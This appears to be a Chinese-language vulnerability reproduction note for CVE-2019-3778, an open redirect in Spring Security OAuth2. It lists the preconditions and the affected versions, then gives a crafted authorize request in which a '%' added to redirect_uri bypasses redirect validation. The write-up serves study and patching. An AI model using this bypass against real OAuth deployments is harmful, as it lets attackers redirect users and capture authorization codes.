(CVE-2019-3778)Spring_Security_OAuth2_开放重定向

# (CVE-2019-3778)Spring Security OAuth2 开放重定向

==========

一、漏洞简介
————

限制条件:

– 有问题的Spring Security OAuth2版本

– oAuth认证使用授权码模式

– 用户需要在登录的情况下

二、漏洞影响
————

Spring Security OAuth 2.3 to 2.3.4Spring Security OAuth 2.2 to 2.2.3Spring Security OAuth 2.1 to 2.1.3Spring Security OAuth 2.0 to 2.0.16

三、复现过程
————

用户登录后,CLIENT APP执行的以下请求包含REDIRECT\_URI参数。
只需添加一个百分号即可触发重定向,而不是通过RedirectMismatchException错误来绕过验证。

例如原始请求如下:

/auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://localhost:8086/login

只需要修改为:

/auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://%localhost:8086/login

这样就不会产生原本的认证错误,而且直接跳转到地址

Location: http://localhost:8086/login

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容